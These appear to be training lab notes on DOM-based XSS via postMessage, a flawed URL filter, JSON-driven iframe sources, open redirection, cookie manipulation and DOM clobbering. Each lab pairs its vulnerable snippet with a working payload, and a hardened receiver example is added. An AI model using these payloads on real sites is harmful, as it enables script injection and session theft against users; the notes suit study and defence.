DOM XSS using web messages
<script>
window.addEventListener('message', function (e) {
// e is the message event; e.data is whatever the sender posted (no origin check, written straight into innerHTML)
document.getElementById('ads').innerHTML = e.data;
})
</script>
IFrame message passing
http://runxinzhi.com/ms-grf-p-11545290.html
<iframe src="https://0a2f00890488e7a6c0f2c14d008b00e0.web-security-academy.net/" onload="this.contentWindow.postMessage('<img src=1 onerror=print()>','*')">
DOM XSS using web messages and a JavaScript URL
<script>
window.addEventListener('message', function (e) {
var url = e.data;
if (url.indexOf('http:') > -1 || url.indexOf('https:') > -1) {
location.href = url;
}
}, false);
</script>
A filter is applied here, but it is flawed: it only checks that the string contains 'http:' or 'https:' somewhere, so a javascript: URL with 'http:' placed after a // comment passes the check.
<iframe src="https://0a21004d04ed6de4c03702320011003f.web-security-academy.net/" onload="this.contentWindow.postMessage('javascript:print()//http:','*')"></iframe>
DOM XSS using web messages and JSON.parse
<script>
window.addEventListener('message', function (e) {
var iframe = document.createElement('iframe'), ACMEplayer = {element: iframe}, d;
// create an iframe first, then assign it to ACMEplayer.element
document.body.appendChild(iframe);
try {
d = JSON.parse(e.data);
// parse the data carried by the event
} catch (e) {
return;
}
switch (d.type) {
case "page-load":
ACMEplayer.element.scrollIntoView();
break;
case "load-channel":
ACMEplayer.element.src = d.url;
break;
case "player-height-changed":
ACMEplayer.element.style.width = d.width + "px";
ACMEplayer.element.style.height = d.height + "px";
break;
}
}, false);
</script>
<iframe src=https://0a3200ce04cdb6cdc0af6734007c006d.web-security-academy.net/ onload='this.contentWindow.postMessage("{\"type\":\"load-channel\",\"url\":\"javascript:print()\"}","*")'></iframe>
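The three web-message labs above share the same root causes: the listener never checks e.origin, and the data is used as HTML or as a URL without validating its scheme. The following is an added example (not code from the labs or from the original notes) of a hardened receiver; the allowed origin, the 'player' element id and the message shape are assumptions.

```javascript
// Added example, not from the labs: a hardened receiver for the three
// web-message labs above. Origin list and message shape are assumptions.
const ALLOWED_ORIGINS = ['https://trusted-player.example']; // assumed
const ALLOWED_SCHEMES = ['http:', 'https:'];

// Decide by the parsed scheme, not by whether 'http:' appears somewhere:
// 'javascript:print()//http:' parses with protocol 'javascript:' and is rejected.
function safeNavigationUrl(raw) {
  if (typeof raw !== 'string') return null;
  let parsed;
  try { parsed = new URL(raw); } catch (e) { return null; } // relative URLs rejected too
  return ALLOWED_SCHEMES.includes(parsed.protocol) ? parsed.href : null;
}

// Validate origin and message before acting. Returns an action object or null.
function handleMessage(origin, data) {
  if (!ALLOWED_ORIGINS.includes(origin)) return null; // the lab listeners never check this
  let msg;
  try { msg = JSON.parse(data); } catch (e) { return null; }
  if (!msg || typeof msg !== 'object') return null;
  switch (msg.type) {
    case 'page-load':
      return { action: 'scroll' };
    case 'load-channel': {
      const url = safeNavigationUrl(msg.url);
      return url ? { action: 'load', url } : null; // javascript: never reaches iframe.src
    }
    case 'player-height-changed': {
      const w = Number(msg.width), h = Number(msg.height);
      return Number.isFinite(w) && Number.isFinite(h) ? { action: 'resize', width: w, height: h } : null;
    }
    default:
      return null;
  }
}

// Browser wiring; skipped under Node. Act only on the validated object, never on e.data.
if (typeof window !== 'undefined') {
  window.addEventListener('message', function (e) {
    const act = handleMessage(e.origin, e.data);
    if (act && act.action === 'load') document.getElementById('player').src = act.url; // 'player' id assumed
  }, false);
}
```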
DOM-based open redirection
https://0a39001b0312d431c0493d9400b70041.web-security-academy.net/post?postId=1&url=https://exploit-0aaa00b803e9d4d3c0323fda01ab001b.exploit-server.net/
DOM-based cookie manipulation
The page writes the current URL into a cookie:
<script>
document.cookie = 'lastViewedProduct=' + window.location + '; SameSite=None; Secure'
</script>
The cookie holds a URL: the page copies the URL into the cookie value, and by testing we find that a single quote (') breaks out of the value where it is later reflected.
<iframe src="https://0ac900e1049a54cdc054d67300df007f.web-security-academy.net/product?productId=2&'><script>print()</script>" onload="if(!window.x)this.src='https://exploit-0a5800e104835458c0ced85701d700b6.exploit-server.net/';window.x=1;">
Exploiting DOM clobbering to enable XSS
<a id=defaultAvatar><a id=defaultAvatar name=avatar href="cid:"onerror=alert(1)//">
Clobbering DOM attributes to bypass HTML filters
<form onclick=alert(1)><input id=attributes>Click me
<iframe src=https://0aae0085044793c3c0c84cc700c000db.web-security-academy.net/post?postId=3 onload="setTimeout(()=>this.src=this.src+'#x',500)">